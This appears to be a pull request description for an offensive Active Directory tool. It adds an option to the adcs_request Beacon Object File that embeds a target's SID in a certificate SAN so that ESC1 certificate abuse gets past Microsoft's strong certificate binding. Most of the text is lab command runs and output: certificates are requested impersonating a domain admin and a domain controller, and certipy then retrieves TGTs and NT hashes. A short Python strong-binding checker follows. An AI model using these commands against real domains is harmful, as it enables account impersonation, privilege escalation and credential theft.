martanne
With recent Microsoft patches strong certificate binding is enforced.

This pull request adds a new option to the adcs_request BOF which allows specifying a URL entry to be added to the SAN. This allows adding the target's SID using the Microsoft-specific prefix (tag:microsoft.com,2022-09-14:sid:) to satisfy strong binding requirements.

All commands below were run in a Ludus lab with the ADCS role applied.

Behavior before the proposed changes, trying to abuse ESC1:

beacon> exec_bof ZZZZssss EDR-DC01-2022.ludus.domain\ludus-CA ESC1 "CN=domainuser,CN=Users,DC=ludus,DC=domain" domainadmin@ludus.domain 0 0 0 0
[*] Running BOF with name "adcs_request.x64.o"

Requesting a ESC1 certificate from EDR-DC01-2022.ludus.domain\ludus-CA for the current user
[*] CA            : EDR-DC01-2022.ludus.domain\ludus-CA
[*] Template      : ESC1
[*] Subject       : CN=domainuser,CN=Users,DC=ludus,DC=domain
[*] AltName (upn)       : domainadmin@ludus.domain
[*] cert.pem      :
-----BEGIN RSA PRIVATE KEY-----...-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----...-----END CERTIFICATE-----
[*] Convert with  :
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

adcs_request SUCCESS.

Show the SAN of the requested certificate:

$ openssl x509 -in cert.pfx -text | grep -A1 "Subject Alternative Name"
            X509v3 Subject Alternative Name: 
                othername: UPN:domainadmin@ludus.domain

Authentication fails because strong certificate binding is not satisfied:

$ certipy auth -pfx cert.pfx -dc-ip 10.7.10.11               
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'domainadmin@ludus.domain'
[*] Using principal: 'domainadmin@ludus.domain'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'domainadmin'
[-] See the wiki for more information

Instead, request a certificate using the patched BOF and supply the target's SID in a Microsoft-specific SAN URL entry:

beacon> exec_bof ZZZZZssss EDR-DC01-2022.ludus.domain\ludus-CA ESC1 "CN=domainuser,CN=Users,DC=ludus,DC=domain" domainadmin@ludus.domain tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105 0 0 0 0
[*] Running BOF with name "adcs_request.x64.o"

Requesting a ESC1 certificate from EDR-DC01-2022.ludus.domain\ludus-CA for the current user
[*] CA            : EDR-DC01-2022.ludus.domain\ludus-CA
[*] Template      : ESC1
[*] Subject       : CN=domainuser,CN=Users,DC=ludus,DC=domain
[*] AltName (upn) : domainadmin@ludus.domain
[*] AltUrl        : tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105
[*] cert.pem      :
-----BEGIN RSA PRIVATE KEY-----...-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----...-----END CERTIFICATE-----
[*] Convert with  :
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

adcs_request SUCCESS.

Verify that the resulting certificate contains the expected SAN entries:

$ openssl x509 -in cert.pfx -text | grep -A1 "Subject Alternative Name"                                         
            X509v3 Subject Alternative Name: 
                othername: UPN:domainadmin@ludus.domain, URI:tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105

This time authentication succeeds:

$ certipy auth -pfx cert.pfx -dc-ip 10.7.10.11                         
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'domainadmin@ludus.domain'
[*]     SAN URL SID: 'S-1-5-21-712980493-1503034693-3565059331-1105'
[*] Using principal: 'domainadmin@ludus.domain'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'domainadmin.ccache'
[*] Wrote credential cache to 'domainadmin.ccache'
[*] Trying to retrieve NT hash for 'domainadmin'
[*] Got hash for 'domainadmin@ludus.domain': aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

The changes were also tested for machine accounts:

beacon> exec_bof ZZZZZssss EDR-DC01-2022.ludus.domain\ludus-CA ESC1 "CN=domainuser,CN=Users,DC=ludus,DC=domain" EDR-DC01-2022.ludus.domain tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1001 0 0 0 1
[*] Running BOF with name "adcs_request.x64.o"

Requesting a ESC1 certificate from EDR-DC01-2022.ludus.domain\ludus-CA for the current user
[*] CA            : EDR-DC01-2022.ludus.domain\ludus-CA
[*] Template      : ESC1
[*] Subject       : CN=domainuser,CN=Users,DC=ludus,DC=domain
[*] AltName (dns) : EDR-DC01-2022.ludus.domain
[*] AltUrl        : tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1001
[*] cert.pem      :
-----BEGIN RSA PRIVATE KEY-----...-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----...-----END CERTIFICATE-----
[*] Convert with  :
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

adcs_request SUCCESS.

Show resulting SAN:

$ openssl x509 -in cert.pfx -text | grep -A1 "Subject Alternative Name"                                         
            X509v3 Subject Alternative Name: 
                DNS:EDR-DC01-2022.ludus.domain, URI:tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1001

Authenticate:

$ certipy auth -pfx cert.pfx -dc-ip 10.7.10.11                         
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'EDR-DC01-2022.ludus.domain'
[*]     SAN URL SID: 'S-1-5-21-712980493-1503034693-3565059331-1001'
[*] Using principal: 'edr-dc01-2022$@ludus.domain'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'edr-dc01-2022.ccache'
[*] Wrote credential cache to 'edr-dc01-2022.ccache'
[*] Trying to retrieve NT hash for 'edr-dc01-2022$'
[*] Got hash for 'edr-dc01-2022$@ludus.domain': aad3b435b51404eeaad3b435b51404ee:2ee4f54dcf70284ea79926af1e28c602

No functional changes, solely in preparation for further SAN entries.
This allows specifying the alternate subject's SID through a SAN URL
entry to satisfy strong certificate binding requirements.

The new parameter should have the following format where the SID is
adapted as needed.

 tag:microsoft.com,2022-09-14:sid:S-1-5-21-712980493-1503034693-3565059331-1105
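The SAN layout described above can be checked offline. The following Python is an added example (not the BOF's code or part of this PR) that parses the SAN line as printed by `openssl x509 -text` and applies the strong-binding decision a DC in enforcement mode makes, using a constructed directory that mirrors the lab's SIDs as an assumption.

```python
"""Check the SAN identities of an issued certificate against strong
certificate binding rules, using the SAN line printed by
`openssl x509 -text`.  Added example, not part of the PR."""
import re

SID_TAG = "tag:microsoft.com,2022-09-14:sid:"  # Microsoft SID URI prefix from the PR
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){4}$")

# Constructed directory mirroring the lab on the page (assumption): principal -> objectSid
DIRECTORY = {
    "domainadmin@ludus.domain": "S-1-5-21-712980493-1503034693-3565059331-1105",
    "edr-dc01-2022.ludus.domain": "S-1-5-21-712980493-1503034693-3565059331-1001",
}


def parse_san(line):
    """Return {'upn', 'dns', 'sid'} from one openssl SAN line.  openssl separates
    entries with ', '; splitting on a bare ',' would cut the tag: URI in half."""
    ids = {"upn": None, "dns": None, "sid": None}
    for entry in line.strip().split(", "):
        if entry.startswith("othername: UPN:"):
            ids["upn"] = entry[len("othername: UPN:"):]
        elif entry.startswith("DNS:"):
            ids["dns"] = entry[len("DNS:"):]
        elif entry.startswith("URI:" + SID_TAG):
            sid = entry[len("URI:" + SID_TAG):]
            if SID_RE.match(sid):  # ignore a malformed SID rather than trusting it
                ids["sid"] = sid
    return ids


def strong_binding_check(san_line, directory=DIRECTORY):
    """Emulate a DC in enforcement mode: accept only if the certificate carries a
    SID URI whose value equals the objectSid of the SAN principal (UPN or DNS)."""
    ids = parse_san(san_line)
    principal = ids["upn"] or ids["dns"]
    if principal is None:
        return "reject", "no UPN or DNS identity in SAN"
    expected = directory.get(principal.lower())
    if expected is None:
        return "reject", f"unknown principal {principal}"
    if ids["sid"] is None:
        return "reject", f"no SID in SAN for {principal} (weak mapping only)"
    if ids["sid"] != expected:
        return "reject", f"SID mismatch for {principal}"
    return "accept", principal
```

Run against the three SAN lines shown in the PR, the first (UPN only) is rejected and the two that carry the matching SID URI are accepted, the same outcome certipy reported.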